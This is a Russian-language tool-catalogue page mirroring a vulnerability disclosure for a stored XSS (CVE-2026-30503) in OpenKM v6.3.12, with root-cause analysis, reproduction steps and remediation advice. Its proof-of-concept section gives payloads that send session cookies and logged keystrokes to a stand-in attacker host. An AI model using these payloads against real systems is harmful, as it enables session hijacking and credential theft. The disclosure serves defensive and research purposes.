Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — # Раскрытие CVE-2026-30503: хранимая XSS-уязвимость в OpenKM v6.3.12 Подробное раскрытие CVE-2026-30503 — хранимой XSS-уязвимости в OpenKM v6.3.12. Включает анализ первопричины, PoC-пейлоады, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров. | Kitploit
Инструменты/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

Репозиторий
83 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

# Раскрытие CVE-2026-30503: хранимая XSS-уязвимость в OpenKM v6.3.12 Подробное раскрытие CVE-2026-30503 — хранимой XSS-уязвимости в OpenKM v6.3.12. Включает анализ первопричины, PoC-пейлоады, оценку воздействия и рекомендации по устранению для исследователей безопасности и пентестеров.

Поделиться

🛡️ CVE-2026-30503 — Хранимый XSS в OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

Обнаружено и сообщено: Dharmendra Kumar — исследователь безопасности

Кибербезопасность | Тестирование на проникновение | Исследование уязвимостей | Ответственное раскрытие


📌 Содержание

  • Обзор
  • Детали CVE
  • Затронутый продукт
  • Описание уязвимости
  • Анализ первопричины
  • Влияние и оценка рисков
  • Доказательство концепции (PoC)
  • Устранение и рекомендации
  • Хронология раскрытия
  • Ссылки
  • Об исследователе

🔍 Обзор

В этом репозитории документируется ответственное раскрытие CVE-2026-30503 — уязвимости хранимого межсайтового скриптинга (Stored Cross-Site Scripting, XSS), обнаруженной в OpenKM v6.3.12 — системе управления документами с открытым исходным кодом, широко используемой в корпоративных средах.

Уязвимость позволяет аутентифицированному злоумышленнику внедрить постоянный вредоносный JavaScript в приложение, который выполняется в контексте браузера любого пользователя (включая администраторов), впоследствии просматривающего затронутый контент.

⚠️ Серьёзность: Высокая | Вектор атаки: Сеть | Требуемые привилегии: Низкие | Взаимодействие с пользователем: Требуется


📋 Детали CVE

ПолеДетали
CVE IDCVE-2026-30503
ПродуктOpenKM
Затронутая версияv6.3.12
Класс уязвимостиХранимый межсайтовый скриптинг (XSS)
CWECWE-79: Improper Neutralization of Input During Web Page Generation
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
ИсследовательDharmendra Kumar
Тип раскрытияОтветственное / скоординированное

📦 Затронутый продукт

OpenKM — это бесплатная система управления документами (DMS) с открытым исходным кодом, предоставляющая веб-интерфейс для управления, аудита и распространения бизнес-документов. Она используется предприятиями, государственными органами и образовательными учреждениями по всему миру.

  • Название продукта: OpenKM Document Management System
  • Затронутая версия: v6.3.12
  • Веб-сайт вендора: https://www.openkm.com
  • Категория: Система управления документами (DMS)
  • Язык/Стек: Java (JSP/Spring)

🧨 Описание уязвимости

В OpenKM v6.3.12 обнаружено несколько уязвимостей хранимого межсайтового скриптинга (Stored XSS). Злоумышленник с низкопривилегированным аутентифицированным доступом может внедрять произвольные JavaScript-полезные нагрузки в одно или несколько полей ввода. Эти полезные нагрузки постоянно хранятся в бэкенде приложения и автоматически выполняются всякий раз, когда любой пользователь — включая администраторов — обращается к затронутой странице или компоненту.

В отличие от отражённого XSS, который требует, чтобы жертва перешла по специально созданной ссылке, полезные нагрузки хранимого XSS встроены в само приложение, что делает их значительно более опасными и устойчивыми.

Уязвимые конечные точки

  • Поля ввода, контролируемые пользователем, в метаданных документов, заметках или полях имён
  • Приложение не выполняет санитизацию и не кодирует пользовательский ввод перед его отображением в браузере

🔬 Анализ первопричины

Уязвимость возникает из-за трёх усугубляющих друг друга слабостей в конвейере обработки ввода приложения:

User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
СлабостьОписание
❌ Отсутствие валидации вводаПриложение не ограничивает и не санитизирует специальные символы (<, >, ", ', ;) в полях, заполняемых пользователем
❌ Отсутствие кодирования выводаСохранённые значения отображаются непосредственно в HTML без кодирования HTML-сущностей
❌ Небезопасный рендеринг DOMДанные, предоставленные пользователем, встраиваются в контекст DOM без CSP или средств санитизации

💥 Влияние и оценка рисков

Успешная эксплуатация этой уязвимости может привести к:

РискОписание
🍪 Угон сессииКража аутентификационных токенов сессии через эксфильтрацию document.cookie
👤 Захват учётной записиКомпрометация учётных записей жертв, включая учётные записи администраторов
🔐 Сбор учётных данныхВнедрение фишинговых форм для перехвата учётных данных
📤 Эксфильтрация данныхСкрытое извлечение конфиденциальных документов или метаданных из DMS
⚙️ Несанкционированные действияВыполнение привилегированных операций от имени жертвы (удаление/изменение документов)
🎯 Нацеливание на администраторовПолезная нагрузка выполняется в админ-панели, когда администратор просматривает контент
🔄 Распространение червяСамовоспроизводящаяся XSS-полезная нагрузка может распространяться между пользователями

🧪 Доказательство концепции (PoC)

⚠️ Отказ от ответственности: Этот PoC предоставлен строго в образовательных целях и для исследований в области безопасности в рамках принципов ответственного раскрытия. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.

Пример полезной нагрузки (общий)

// Basic PoC — demonstrates script execution
<script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>

// Session token exfiltration
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// Keylogger injection
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

Шаги воспроизведения

  1. Войдите в OpenKM v6.3.12 под низкопривилегированной аутентифицированной учётной записью
  2. Перейдите к уязвимому полю ввода (например, метаданные документа / примечания / поле названия)
  3. Внедрите XSS-полезную нагрузку, например <script>alert(document.cookie)</script>
  4. Сохраните / отправьте запись
  5. Войдите как другой пользователь (или администратор) и перейдите к затронутому ресурсу
  6. Наблюдайте выполнение JavaScript-полезной нагрузки в контексте браузера жертвы

🛠️ Устранение и рекомендации

Для разработчиков / вендоров

РекомендацияРеализация
✅ Валидация вводаСоставьте белый список допустимых символов; отклоняйте или удаляйте HTML-спецсимволы во всех пользовательских вводах
✅ Кодирование выводаИспользуйте контекстно-зависимое HTML-кодирование (например, OWASP Java Encoder) перед выводом данных в HTML
✅ Политика безопасности контента (CSP)Внедрите строгий CSP-заголовок: Content-Security-Policy: script-src 'self'
✅ HTTPOnly и безопасные cookieУстановите флаги HttpOnly и Secure для всех cookie сессии, чтобы предотвратить доступ из JavaScript
✅ Использование библиотек безопасностиИнтегрируйте OWASP AntiSamy или DOMPurify для санитизации HTML
✅ Проверка кода на безопасностьАудируйте все пути рендеринга на предмет несанитизированных пользовательских данных
✅ ОбновлениеПримените последний патч от вендора или обновитесь до исправленной версии

Для системных администраторов

Скачать инструмент